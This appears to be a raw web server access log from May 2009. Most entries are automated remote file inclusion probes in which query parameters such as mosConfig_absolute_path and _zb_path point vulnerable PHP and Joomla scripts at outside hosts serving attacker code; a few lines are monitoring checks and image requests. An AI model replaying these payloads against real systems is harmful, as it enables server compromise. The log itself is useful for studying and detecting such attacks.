221.139.104.104 - - [31/May/2009:07:30:08 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://largeface.com/gnuboard4/tail/fid.txt? HTTP/1.1" 200 3567 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:07:30:08 -0400] "GET /logs/access_log.Q109051800//?_SERVER[DOCUMENT_ROOT]=http://largeface.com/gnuboard4/tail/fid.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:07:31:12 -0400] "GET /logs/access_log.Q109052200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:07:31:53 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://dayea.net/bbs//jso/fx29id1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:07:31:53 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://dayea.net/bbs//jso/fx29id1.txt??? HTTP/1.1" 200 3567 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:07:31:53 -0400] "GET /logs/access_log.Q109051800//?_SERVER[DOCUMENT_ROOT]=http://dayea.net/bbs//jso/fx29id1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:07:33:10 -0400] "GET /?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
208.103.111.2 - - [31/May/2009:07:33:28 -0400] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://stptcellular.net/webalizer/test.txt? HTTP/1.1" 404 257 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
208.103.111.2 - - [31/May/2009:07:33:29 -0400] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://stptcellular.net/webalizer/test.txt? HTTP/1.1" 404 262 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
218.246.20.221 - - [31/May/2009:07:33:59 -0400] "GET /logs/access_log.Q109051800/?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:07:34:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.15.161.2 - - [31/May/2009:07:34:10 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.bikelister.com/test.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
216.15.161.2 - - [31/May/2009:07:34:10 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.bikelister.com/test.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
218.246.20.221 - - [31/May/2009:07:34:21 -0400] "GET /logs/?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 200 3562 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:07:34:58 -0400] "GET /logs/access_log.Q109052200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
213.246.62.35 - - [31/May/2009:07:35:16 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
213.246.62.35 - - [31/May/2009:07:35:16 -0400] "GET //include/bbs.lib.inc.php?site_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
213.246.62.35 - - [31/May/2009:07:35:16 -0400] "GET /logs/access_log.Q109051100//include/bbs.lib.inc.php?site_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
85.119.158.133 - - [31/May/2009:07:35:22 -0400] "GET //amember/errors.php?error=http://www.bikelister.com/test.txt?? HTTP/1.1" 404 217 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
85.119.158.133 - - [31/May/2009:07:35:22 -0400] "GET /logs//amember/errors.php?error=http://www.bikelister.com/test.txt?? HTTP/1.1" 404 222 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
85.119.158.133 - - [31/May/2009:07:35:23 -0400] "GET /logs//amember/errors.php?error=http://www.bikelister.com/test.txt?? HTTP/1.1" 404 222 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
85.119.158.133 - - [31/May/2009:07:35:24 -0400] "GET //amember/errors.php?error=http://www.bikelister.com/test.txt?? HTTP/1.1" 404 217 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
216.15.161.2 - - [31/May/2009:07:35:45 -0400] "GET //amember/errors.php?error=http://www.bikelister.com/test.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
216.15.161.2 - - [31/May/2009:07:35:46 -0400] "GET /logs//amember/errors.php?error=http://www.bikelister.com/test.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
84.32.195.2 - - [31/May/2009:07:37:20 -0400] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
218.246.20.221 - - [31/May/2009:07:37:41 -0400] "GET /logs/access_log.Q109051800%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:07:37:46 -0400] "GET /?sourcedir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:07:37:46 -0400] "GET /logs/?sourcedir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 200 3562 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:07:37:46 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
161.58.145.144 - - [31/May/2009:07:38:34 -0400] "GET //amember/errors.php?error=http://www.bikelister.com/test.txt?? HTTP/1.1" 404 217 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
161.58.145.144 - - [31/May/2009:07:38:34 -0400] "GET /logs//amember/errors.php?error=http://www.bikelister.com/test.txt?? HTTP/1.1" 404 222 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
209.59.12.99 - - [31/May/2009:07:39:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.146.68.61 - - [31/May/2009:07:39:12 -0400] "GET /logs/error_log.Q108090500%20%20/?sourcedir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:07:39:17 -0400] "GET /?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
91.186.238.170 - - [31/May/2009:07:39:34 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
91.186.238.170 - - [31/May/2009:07:39:34 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
218.249.36.194 - - [31/May/2009:07:39:38 -0400] "GET ///components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jamur-x.do.am/id1.txt??????? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
218.249.36.194 - - [31/May/2009:07:39:38 -0400] "GET /logs///components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jamur-x.do.am/id1.txt??????? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
218.249.36.194 - - [31/May/2009:07:39:38 -0400] "GET /logs/access_log.Q109010700///components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jamur-x.do.am/id1.txt??????? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:07:39:38 -0400] "GET /logs/?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 200 3562 "-" "Mozilla/5.0"
218.249.36.194 - - [31/May/2009:07:39:42 -0400] "GET /logs/access_log.Q109031800///components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jamur-x.do.am/id1.txt??????? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
91.186.238.170 - - [31/May/2009:07:39:45 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
91.186.238.170 - - [31/May/2009:07:39:45 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
218.249.36.194 - - [31/May/2009:07:39:45 -0400] "GET /logs///components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jamur-x.do.am/id1.txt??????/? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
218.249.36.194 - - [31/May/2009:07:39:45 -0400] "GET /logs/access_log.Q109010700///components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jamur-x.do.am/id1.txt??????/? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
218.249.36.194 - - [31/May/2009:07:39:46 -0400] "GET ///components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jamur-x.do.am/id1.txt??????/? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
218.249.36.194 - - [31/May/2009:07:39:46 -0400] "GET /logs/access_log.Q109010700%20%20///components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jamur-x.do.am/id1.txt??????/? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
218.249.36.194 - - [31/May/2009:07:39:50 -0400] "GET /logs/access_log.Q109031800%20%20///components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jamur-x.do.am/id1.txt??????/? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:07:39:55 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:07:39:55 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:07:39:55 -0400] "GET /logs/access_log.Q109051100//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:07:40:23 -0400] "GET /logs/access_log.Q109051500//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:07:40:42 -0400] "GET //include/write.php?dir=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:07:40:45 -0400] "GET /logs//include/write.php?dir=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:07:40:45 -0400] "GET /logs/access_log.Q109051100//include/write.php?dir=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:07:40:47 -0400] "GET /?sourcedir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:07:40:47 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:07:40:47 -0400] "GET /logs/?sourcedir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 200 3562 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:07:41:07 -0400] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://russianwomenabroad.com/poll/include/test.txt??? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
62.146.68.61 - - [31/May/2009:07:41:07 -0400] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://russianwomenabroad.com/poll/include/test.txt??? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
62.146.68.61 - - [31/May/2009:07:41:48 -0400] "GET /logs/error_log.Q108090500%20%20/?sourcedir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
218.249.36.194 - - [31/May/2009:07:42:18 -0400] "GET /logs/access_log.Q109031800///components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jamur-x.do.am/id1.txt??????/? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
84.32.195.2 - - [31/May/2009:07:42:24 -0400] "GET /logs/access_log.Q109051000//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.803"
84.32.195.2 - - [31/May/2009:07:42:25 -0400] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
84.32.195.2 - - [31/May/2009:07:42:25 -0400] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.803"
218.246.20.221 - - [31/May/2009:07:43:00 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:07:43:00 -0400] "GET /logs/access_log.Q109051100%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:07:43:04 -0400] "GET /logs/access_log.Q109051800/?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:07:43:07 -0400] "GET /logs/?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 200 3562 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:07:43:24 -0400] "GET /logs/?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 200 3562 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:07:43:25 -0400] "GET /logs/access_log.Q109051800/?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:07:43:47 -0400] "GET /logs/access_log.Q109051800/?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:07:43:47 -0400] "GET /logs/access_log.Q109051800/?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:07:44:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.246.20.221 - - [31/May/2009:07:44:21 -0400] "GET /?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:07:44:31 -0400] "GET /?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:07:44:34 -0400] "GET /?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:07:44:48 -0400] "GET /logs/access_log.Q109052200/?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:07:45:10 -0400] "GET /?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:07:45:10 -0400] "GET /logs/?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 200 3562 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:07:45:14 -0400] "GET /logs/access_log.Q109051800%20%20/?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:07:45:20 -0400] "GET /?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:07:45:20 -0400] "GET /logs/?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 200 3562 "-" "Mozilla/5.0"
218.249.36.194 - - [31/May/2009:07:45:37 -0400] "GET /logs/access_log.Q109010700%20%20///components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jamur-x.do.am/id1.txt??????? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
218.249.36.194 - - [31/May/2009:07:45:38 -0400] "GET /logs/access_log.Q109031800%20%20///components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jamur-x.do.am/id1.txt??????? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:07:45:49 -0400] "GET /?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:07:46:05 -0400] "GET /logs/access_log.Q109051800/?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:07:46:05 -0400] "GET /logs/?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 200 3562 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:07:46:24 -0400] "GET /logs/?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 200 3562 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:07:46:27 -0400] "GET /logs/access_log.Q109051800%20%20/?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:07:46:35 -0400] "GET /logs/access_log.Q109052200/?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.249.36.194 - - [31/May/2009:07:47:27 -0400] "GET /logs/access_log.Q109052100///components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jamur-x.do.am/id1.txt??????/? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
218.249.36.194 - - [31/May/2009:07:47:27 -0400] "GET /logs/access_log.Q109051500///components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jamur-x.do.am/id1.txt??????/? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
94.23.200.54 - - [31/May/2009:07:47:54 -0400] "GET /logs/access_log.Q109051800//?_SERVER[DOCUMENT_ROOT]=http://dayea.net/bbs//jso/fx29id1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
94.23.200.54 - - [31/May/2009:07:47:54 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://dayea.net/bbs//jso/fx29id1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
94.23.200.54 - - [31/May/2009:07:47:54 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://dayea.net/bbs//jso/fx29id1.txt??? HTTP/1.1" 200 3567 "-" "Mozilla/5.0"
112.175.141.41 - - [31/May/2009:07:48:07 -0400] "GET /logs/access_log.Q109051500//akocomments.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:07:48:08 -0400] "GET /logs/access_log.Q109052200/?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:07:48:17 -0400] "GET /logs/access_log.Q109052200/?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
85.119.154.129 - - [31/May/2009:07:49:02 -0400] "GET /logs/access_log.Q109051800//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 290 "-" "libwww-perl/5.805"
85.119.154.129 - - [31/May/2009:07:49:02 -0400] "GET /logs/access_log.Q109051800//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 290 "-" "libwww-perl/5.805"
85.119.154.129 - - [31/May/2009:07:49:02 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
85.119.154.129 - - [31/May/2009:07:49:02 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
85.119.154.129 - - [31/May/2009:07:49:02 -0400] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
85.119.154.129 - - [31/May/2009:07:49:02 -0400] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
218.246.20.221 - - [31/May/2009:07:49:08 -0400] "GET /?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:07:49:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
112.175.141.41 - - [31/May/2009:07:49:15 -0400] "GET /logs/error_log.Q109051400//akocomments.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
84.32.195.2 - - [31/May/2009:07:49:26 -0400] "GET /logs/error_log.Q109051400//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
218.246.20.221 - - [31/May/2009:07:49:41 -0400] "GET /logs/access_log.Q109052200%20%20/?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:07:49:41 -0400] "GET /logs/access_log.Q109052200/?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:07:49:45 -0400] "GET /logs/access_log.Q109051800%20%20/?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:07:49:45 -0400] "GET /logs/?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 200 3562 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:07:51:15 -0400] "GET /logs/access_log.Q109052200%20%20/?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:07:51:40 -0400] "GET /logs/?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 200 3562 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:07:52:15 -0400] "GET /inc/functions.inc.php?config[ppa_root_path]=http://russianwomenabroad.com/poll/include/test.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
62.146.68.61 - - [31/May/2009:07:52:15 -0400] "GET /logs/inc/functions.inc.php?config[ppa_root_path]=http://russianwomenabroad.com/poll/include/test.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
218.246.20.221 - - [31/May/2009:07:52:47 -0400] "GET /logs/access_log.Q109051800/?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:07:52:48 -0400] "GET /?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
213.246.62.35 - - [31/May/2009:07:53:44 -0400] "GET /logs/error_log.Q108070200/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/superscan/id.txt? HTTP/1.1" 404 268 "-" "libwww-perl/5.803"
213.246.62.35 - - [31/May/2009:07:53:44 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/superscan/id.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
213.246.62.35 - - [31/May/2009:07:53:44 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/superscan/id.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
62.146.68.61 - - [31/May/2009:07:54:04 -0400] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:07:54:04 -0400] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
